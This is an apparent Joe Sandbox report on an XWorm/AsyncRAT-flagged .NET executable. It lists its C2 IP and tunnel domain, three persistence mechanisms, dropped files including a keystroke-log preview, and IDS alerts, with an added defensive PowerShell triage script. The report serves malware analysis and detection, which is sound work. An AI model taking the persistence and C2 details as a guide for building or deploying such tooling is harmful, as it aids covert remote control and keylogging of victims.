            http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.2204739070.000002A2A0319000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2263189252.00000204B4BB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2362621847.0000016080229000.00000004.00000800.00020000.00000000.sdmp | false | high
            http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000008.00000002.2362621847.0000016080229000.00000004.00000800.00020000.00000000.sdmp | false | high
            http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.2204739070.000002A2A0319000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2263189252.00000204B4BB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2362621847.0000016080229000.00000004.00000800.00020000.00000000.sdmp | false | high
            https://contoso.com/ | powershell.exe, 00000008.00000002.2456761857.0000016090070000.00000004.00000800.00020000.00000000.sdmp | false | high
            https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2231159218.000002A2B0160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2316892887.00000204C4A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2456761857.0000016090070000.00000004.00000800.00020000.00000000.sdmp | false | high
            https://contoso.com/License | powershell.exe, 00000008.00000002.2456761857.0000016090070000.00000004.00000800.00020000.00000000.sdmp | false | high
            http://crl.mic | powershell.exe, 00000008.00000002.2490603239.00000160F7B73000.00000004.00000020.00020000.00000000.sdmp | false | high
            https://contoso.com/Icon | powershell.exe, 00000008.00000002.2456761857.0000016090070000.00000004.00000800.00020000.00000000.sdmp | false | high
            http://crl.micft.cMicRosof | powershell.exe, 00000008.00000002.2490603239.00000160F7B73000.00000004.00000020.00020000.00000000.sdmp | false | high
            https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2204739070.000002A2A00F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2263189252.00000204B4991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2362621847.0000016080001000.00000004.00000800.00020000.00000000.sdmp | false | high
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | PjGz899RZV.exe, 00000000.00000002.3393220395.0000000002391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2204739070.000002A2A00F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2263189252.00000204B4991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2362621847.0000016080001000.00000004.00000800.00020000.00000000.sdmp | false | high
            https://github.com/Pester/Pester | powershell.exe, 00000008.00000002.2362621847.0000016080229000.00000004.00000800.00020000.00000000.sdmp | false | high
            Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
            147.185.221.24 | below-communist.gl.at.ply.gg | United States | 12087 | SALSGIVERUS | true
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1579065
                                                Start date and time:2024-12-20 18:59:05 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 5m 53s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:19
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:PjGz899RZV.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:53db4fa18cd42cdb875538b91c6f500f22727be4cd1d0e0a618159462a8b76ba.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@17/17@1/1
                                                EGA Information:
                                                • Successful, ratio: 12.5%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 74
                                                • Number of non-executed functions: 8
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target PjGz899RZV.exe, PID 1612 because it is empty
                                                • Execution Graph export aborted for target PjGz899RZV.exe, PID 1864 because it is empty
                                                • Execution Graph export aborted for target PjGz899RZV.exe, PID 3052 because it is empty
                                                • Execution Graph export aborted for target PjGz899RZV.exe, PID 3404 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 1924 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 2720 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 7160 because it is empty
• Not all processes were analysed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtCreateKey calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • VT rate limit hit for: PjGz899RZV.exe
Time | Type | Description
13:00:02 | API Interceptor | 42x Sleep call for process: powershell.exe modified
13:00:43 | API Interceptor | 1598313x Sleep call for process: PjGz899RZV.exe modified
19:00:38 | Task Scheduler | Run new task: PjGz899RZV path: C:\Users\user\AppData\Roaming\PjGz899RZV.exe
19:00:41 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PjGz899RZV C:\Users\user\AppData\Roaming\PjGz899RZV.exe
19:00:50 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PjGz899RZV C:\Users\user\AppData\Roaming\PjGz899RZV.exe
19:00:58 | Autostart | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PjGz899RZV.lnk
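The timeline records three persistence mechanisms for the same Roaming copy (a scheduled task, an HKCU Run value and a Startup-folder shortcut) plus one C2 endpoint. The following PowerShell triage script is an added example, not part of the Joe Sandbox report or of the sample; it checks a suspect host for exactly those artifacts. The file name, registry value name, drop path, sample hash and network indicators are taken from this report; the variable names, the HKLM Run and Defender-exclusion checks, and the use of the ScheduledTasks, NetTCPIP and DnsClient modules are assumptions of the example (Windows 10, run from an elevated PowerShell).

```powershell
# Added triage script: hunts for the persistence artifacts and network indicator
# recorded in this report. Values marked "from report" come from the timeline and
# IP table above; everything else is an assumption of this example.
$SuspectName = 'PjGz899RZV'                                          # from report
$SuspectPath = Join-Path $env:APPDATA "$SuspectName.exe"             # from report: AppData\Roaming\PjGz899RZV.exe
$KnownSha256 = '53DB4FA18CD42CDB875538B91C6F500F22727BE4CD1D0E0A618159462A8B76BA'  # from report (submitted sample)
$C2Ip        = '147.185.221.24'                                      # from report
$C2Domain    = '*.gl.at.ply.gg'                                      # from report; the host label rotates, so match the tunnel domain

$findings = New-Object System.Collections.Generic.List[string]

# 1. Run values. The report shows the value under HKCU (logged in both registry
#    views); HKLM is checked as well as a routine extra, not because the report shows it.
foreach ($key in 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
                 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run') {
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if (-not $props) { continue }
    foreach ($p in $props.PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }                        # skip PSPath/PSParentPath metadata properties
        $val = [string]$p.Value
        if ($val -like "*$SuspectName*" -or $val -like '*\AppData\Roaming\*.exe*') {
            $findings.Add("Run value $key\$($p.Name) = $val")
        }
    }
}

# 2. Scheduled tasks whose action executes a binary under AppData\Roaming
#    (the report records a task named PjGz899RZV pointing at the Roaming copy).
foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
    foreach ($a in $task.Actions) {
        $exe = [string]$a.Execute                                    # empty for non-exec actions, so the match below fails safely
        if ($exe -like "*$SuspectName*" -or $exe -like '*\AppData\Roaming\*') {
            $findings.Add("Scheduled task $($task.TaskPath)$($task.TaskName) -> $exe $($a.Arguments)")
        }
    }
}

# 3. Startup-folder shortcuts, resolved to their target so a benign-looking .lnk
#    name cannot hide the Roaming executable behind it.
$shell   = New-Object -ComObject WScript.Shell
$startup = [Environment]::GetFolderPath('Startup')
foreach ($lnk in Get-ChildItem -Path $startup -Filter '*.lnk' -ErrorAction SilentlyContinue) {
    $target = $shell.CreateShortcut($lnk.FullName).TargetPath
    if ($target -like "*$SuspectName*" -or $target -like '*\AppData\Roaming\*.exe') {
        $findings.Add("Startup shortcut $($lnk.FullName) -> $target")
    }
}

# 4. The dropped copy itself. A hash mismatch does not clear the host: the drop
#    path and name are the finding, the hash only tells you whether it is this exact build.
if (Test-Path -LiteralPath $SuspectPath) {
    $hash = (Get-FileHash -LiteralPath $SuspectPath -Algorithm SHA256).Hash
    $note = if ($hash -eq $KnownSha256) { 'identical to submitted sample' } else { 'different build, same drop path' }
    $findings.Add("File present: $SuspectPath SHA256=$hash ($note)")
}

# 5. Network indicator. The IP is shared tunnel infrastructure (the context table
#    lists several unrelated families on it), so a cached lookup of the tunnel
#    domain is the more specific signal; an established connection is confirmation.
foreach ($c in Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue) {
    if ($c.RemoteAddress -eq $C2Ip) {
        $owner = (Get-Process -Id $c.OwningProcess -ErrorAction SilentlyContinue).ProcessName
        $findings.Add("Connection to ${C2Ip}:$($c.RemotePort) from PID $($c.OwningProcess) ($owner)")
    }
}
foreach ($d in Get-DnsClientCache -ErrorAction SilentlyContinue) {
    if ($d.Entry -like $C2Domain) { $findings.Add("DNS cache entry $($d.Entry) -> $($d.Data)") }
}

# 6. Defender exclusion paths inside the user profile. This is a generic RAT
#    triage check added by the example, not tied to an entry in the timeline above.
$mp = Get-MpPreference -ErrorAction SilentlyContinue
foreach ($ex in @($mp.ExclusionPath)) {
    if ($ex -and ($ex -like '*\AppData\*' -or $ex -like "*$SuspectName*")) {
        $findings.Add("Defender exclusion path: $ex")
    }
}

if ($findings.Count -eq 0) { Write-Output 'No artifacts from this report found on host.' }
else { $findings | ForEach-Object { Write-Output "[!] $_" } }
```

The checks deliberately match on the drop location (any .exe under AppData\Roaming) and not only on the literal name PjGz899RZV, because the name here is just the renamed hash the sandbox assigned; a real infection keeps whatever name the distributor chose while the three persistence locations stay the same.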
Context: IPs (associated sample name, detection, threat name)
Match: 147.185.221.24
• ehxF3rusxJ.exe: malicious, XWorm
• Client-built-Playit.exe: malicious, Quasar
• file.exe: malicious, ScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, Xmrig
• 72OWK7wBVH.exe: malicious, XWorm
• aZDwfEKorn.exe: malicious, XWorm
• HdTSntLSMB.exe: malicious, XWorm
• file.exe: malicious, XWorm
• file.exe: malicious, XWorm
• NhoqAfkhHL.bat: malicious, Unknown
• a4lIk1Jrla.exe: malicious, Njrat, RevengeRAT
Context: Domains
No context
Context: ASNs (associated sample name, detection, threat name, IP)
Match: SALSGIVERUS
• ehxF3rusxJ.exe: malicious, XWorm (147.185.221.24)
• loligang.ppc.elf: malicious, Mirai (147.184.134.130)
• Client-built-Playit.exe: malicious, Quasar (147.185.221.24)
• PowerRat.exe: malicious, AsyncRAT (147.185.221.211)
• file.exe: malicious, ScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, Xmrig (147.185.221.24)
• msedge.exe: malicious, XWorm (147.185.221.22)
• imagelogger.exe: malicious, XWorm (147.185.221.229)
• NJRAT DANGEROUS.exe: malicious, XWorm (147.185.221.181)
• com surrogate.exe: malicious, XWorm (147.185.221.22)
• lastest.exe: malicious, Njrat (147.185.221.20)
Context: JA3 fingerprints
No context
Context: Dropped files
No context
Process: C:\Users\user\AppData\Roaming\PjGz899RZV.exe
File Type: CSV text
Category: dropped
Size (bytes): 654
Entropy (8bit): 5.380476433908377
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5: 30E4BDFC34907D0E4D11152CAEBE27FA
SHA1: 825402D6B151041BA01C5117387228EC9B7168BF
SHA-256: A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512: 89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious: true
Reputation: moderate, very likely benign file
Preview (this is the .NET CLR assembly usage log format; it records which assemblies the Roaming copy loaded, here System, System.Core and Microsoft.VisualBasic, and carries no payload of its own):
1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):64
                                                                    Entropy (8bit):0.34726597513537405
                                                                    Encrypted:false
                                                                    SSDEEP:3:Nlll:Nll
                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                    Malicious:false
                                                                    Preview:@...e...........................................................
Process: C:\Users\user\Desktop\PjGz899RZV.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 41
Entropy (8bit): 3.7195394315431693
Encrypted: false
SSDEEP: 3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
MD5: 0DB526D48DAB0E640663E4DC0EFE82BA
SHA1: 17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
SHA-256: 934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
SHA-512: FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
Malicious: false
Preview (consistent with a keystroke log: an active-window header "### explorer ###" followed by captured key names, here the Windows key and "r" three times):
....### explorer ###..[WIN]r[WIN]r[WIN]r
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Note: this is PowerShell's own __PSScriptPolicyTest_*.ps1/.psm1 probe, written to the user's temp folder when a PowerShell host starts so it can test whether AppLocker/WDAC forces constrained language mode; it is a side effect of the sample launching PowerShell, not an attacker-authored file. The report lists 12 identical entries of this file (same hashes throughout), one for each probe file written by the PowerShell processes in this run.
                                                                    Process:C:\Users\user\Desktop\PjGz899RZV.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 20 17:00:37 2024, mtime=Fri Dec 20 17:00:39 2024, atime=Fri Dec 20 17:00:39 2024, length=38400, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):784
                                                                    Entropy (8bit):5.101836606825283
                                                                    Encrypted:false
                                                                    SSDEEP:12:8BC+4gApnu8Ch6ilXIsY//ztbjLJpAyoODtYjAn+HPEOLfbSRbymV:8BcgoDJilXU7tJuy5yAnCBfImm
                                                                    MD5:20214D4BEDE61AF9FF145373F8D786C3
                                                                    SHA1:3D1C75E3500A1F6C68F13D2CE06675E4307AF984
                                                                    SHA-256:C3B1B4F0448CA686AE838CD5C66A2667CC579DD6E34081E34E82A8F6EA9B199E
                                                                    SHA-512:FB0F80342716691B6E126B5692FAEFC6D306A6D0A879650C4D46A9096E8F95ACC4322516AFA2C3A997508DBDD85ED0CB708E91B3FD2DFF3EB236EAAFF68A87F6
                                                                    Malicious:false
                                                                    Preview:L..................F.... ...X....S..b(...S..b(...S..........................~.:..DG..Yr?.D..U..k0.&...&.......$..S....X...S.......S......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y|............................^.A.p.p.D.a.t.a...B.V.1......Yz...Roaming.@......EW<2.Yz...../.....................T\..R.o.a.m.i.n.g.....j.2......Y.. .PJGZ89~1.EXE..N......Y...Y..............................^.P.j.G.z.8.9.9.R.Z.V...e.x.e......._...............-.......^............B.8.....C:\Users\user\AppData\Roaming\PjGz899RZV.exe........\.....\.....\.....\.....\.P.j.G.z.8.9.9.R.Z.V...e.x.e.`.......X.......284330...........hT..CrF.f4... ..*.K.....-...-$..hT..CrF.f4... ..*.K.....-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                    Process:C:\Users\user\Desktop\PjGz899RZV.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):38400
                                                                    Entropy (8bit):5.546989998450206
                                                                    Encrypted:false
                                                                    SSDEEP:768:xLyB8NkqoKs4LB8ejyAEM5FWPh9rF67OwhP9JIkH:x01qof4L2EFK9rF67OwRPR
                                                                    MD5:2FCDE28EF23D2644520AC5AEFC123E61
                                                                    SHA1:CE5C3D508AC86A431619F84D2D10FF149479E8BF
                                                                    SHA-256:53DB4FA18CD42CDB875538B91C6F500F22727BE4CD1D0E0A618159462A8B76BA
                                                                    SHA-512:08211849BE5047245A3327C89F1F952CBE9B870BACD72FBFF6E4DDD69D762E88B68BE044DDCEC53B8781DA9267358939002337990EEC542BEFD334F733ED4AF3
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe, Author: Joe Security
                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe, Author: ditekSHen
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....eg............................n.... ........@.. ....................................@................................. ...K.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........V...S............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):5.546989998450206
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    File name:PjGz899RZV.exe
                                                                    File size:38'400 bytes
                                                                    MD5:2fcde28ef23d2644520ac5aefc123e61
                                                                    SHA1:ce5c3d508ac86a431619f84d2d10ff149479e8bf
                                                                    SHA256:53db4fa18cd42cdb875538b91c6f500f22727be4cd1d0e0a618159462a8b76ba
                                                                    SHA512:08211849be5047245a3327c89f1f952cbe9b870bacd72fbff6e4ddd69d762e88b68be044ddcec53b8781da9267358939002337990eec542befd334f733ed4af3
                                                                    SSDEEP:768:xLyB8NkqoKs4LB8ejyAEM5FWPh9rF67OwhP9JIkH:x01qof4L2EFK9rF67OwRPR
                                                                    TLSH:C9035C443FD4822AC5FE6BFA2972A2150271E6039E23DF5E08D4956A6F37FC44A053D7
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....eg............................n.... ........@.. ....................................@................................
                                                                    Icon Hash:00928e8e8686b000
                                                                    Entrypoint:0x40aa6e
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x67658EFB [Fri Dec 20 15:36:27 2024 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xaa20 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x4e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x8a74 | 0x8c00 | af938ca1e01af6a093ffe64108ba2b63 | False | 0.48978794642857143 | data | 5.674193470127746 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0x4e0 | 0x600 | 16ad0bb50a751ff817986a46790244bf | False | 0.37890625 | data | 3.74423362309005 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe000 | 0xc | 0x200 | 4888fe0d82a3655bd240dd6bd02390d2 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xc0a0 | 0x24c | data | | | 0.47278911564625853
RT_MANIFEST | 0xc2f0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041

DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-20T19:01:41.924244+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.6 | 49910 | 147.185.221.24 | 38116 | TCP
2024-12-20T19:02:03.277167+0100 | 2853193 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.6 | 49961 | 147.185.221.24 | 38116 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 20, 2024 19:00:44.192399979 CET | 49801 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:00:44.315383911 CET | 38116 | 49801 | 147.185.221.24 | 192.168.2.6
Dec 20, 2024 19:00:44.315468073 CET | 49801 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:00:44.401918888 CET | 49801 | 38116 | 192.168.2.6 | 147.185.221.24
Dec 20, 2024 19:00:44.525233984 CET | 38116 | 49801 | 147.185.221.24 | 192.168.2.6
Dec 20, 2024 19:00:58.683888912 CET | 49801 | 38116 | 192.168.2.6 | 147.185.221.24
